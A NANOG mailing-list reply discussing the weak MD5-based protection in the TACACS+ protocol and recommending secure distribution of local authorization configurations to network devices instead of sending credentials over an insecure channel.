On Wed, Sep 20, 2023 at 11:16 AM Mike Lewinski via NANOG <
nanog@nanog.org> wrote:
Yes. Well, on the plus side the TACACS protocol has not really changed in 30 years,
Even the 2015 code could work provided you can compile its dependencies from sources, right...
On the downside, for the command authorization use:
TACACS+ provides little protection for messages between client and server;
The protocol's MD5 crypto is so weak that routers using TACACS+ for authentication
might as well just be piping over user credentials in the clear: it's barely any better.
Router operating systems still typically use only passwords with
SSH, then those devices send the passwords over that insecure channel. I have yet to
see much in terms of routers capable to Tacacs+ Authorize users based on users'
openSSH certificate, Public key id, or ed2559-sk security key id, etc.
In short.. unless you got a VPN or a dedicated secure link from every single device to
its Tacacs server or an Experimental implementation of TACACS+ over TLS:
I would suggest consider Using tools or scripts to distribute users and Authorizing configurations to
devices as local authorization through secure protocols as favorable to those network authentication systems
that transmit sensitive decisions and user data across the network using Insecure protocols.
--
-Jim